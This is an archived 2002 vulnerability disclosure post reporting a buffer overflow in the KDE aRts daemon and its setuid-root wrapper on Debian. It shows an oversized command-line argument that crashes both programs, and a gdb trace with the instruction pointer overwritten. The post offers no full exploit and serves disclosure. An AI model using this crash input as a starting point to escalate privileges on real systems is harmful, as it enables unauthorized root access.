artsd overflow

Type securityvulns
Reporter Securityvulns
Modified 2002-01-04T00:00:00



Happy new year.

Take a look at this:

r00t:~$ ls -las `which artswrapper` `which artsd` 4 -rwsr-xr-x    1 root     root     4048 Dec 28 22:43 /usr/bin/artswrapper 120 -rwxr-xr-x  1 root     root   117644 Dec 28 22:43 /usr/bin/artsd

r00t:~$ artsd -m `perl -e 'print "A"x3000'` Segmentation fault

r00t:~$ gdb artsd GNU gdb 5.1 Copyright 2001 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB.  Type "show warranty" for details. This GDB was configured as "i386-linux"...(no debugging symbols found)... (gdb) r -m `perl -e 'print "A"x3000'` Starting program: /usr/bin/artsd -m `perl -e 'print "A"x3000'` - - -----------cut-------------- Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 1024 (LWP 11372)] 0x41414141 in ?? ()

r00t:~$ artswrapper -m `perl -e 'print "A"x3000'` >> running as realtime process now (priority 50) Segmentation fault

Is this exploitable?

r00t:~$ dpkg -s libarts | grep Version Version: 4:2.2.2-10

Using Debian Sid.

Linux registered User #142704 Clave PGP: Fingerprint = F6B3 B665 95FA B9D0 13FD 72D5 5106 22F7 58BD 7EDE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vosotros me imponeis la ley del silencio | You are in a dark room with a poque teneis miedo de que este, vuestro | compiler, emacs, an internet mundo, no sea el mejor de los mundos | connection, and a thermos of sino el peor, el mas sordido. - Dario Fo | coffe. Your move?

-----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use MessageID: 4q2WLd8+MvqQK9xhebZuGUc7ZoVx6F/z

iQA/AwUAPDUKDFEGIvdYvX7eEQK+mwCglluFmjdk/L3YvHl40iUIReX1s+4AoJkm WvVT8je7pBYymCdaaGbTUr0H =P17j -----END PGP SIGNATURE-----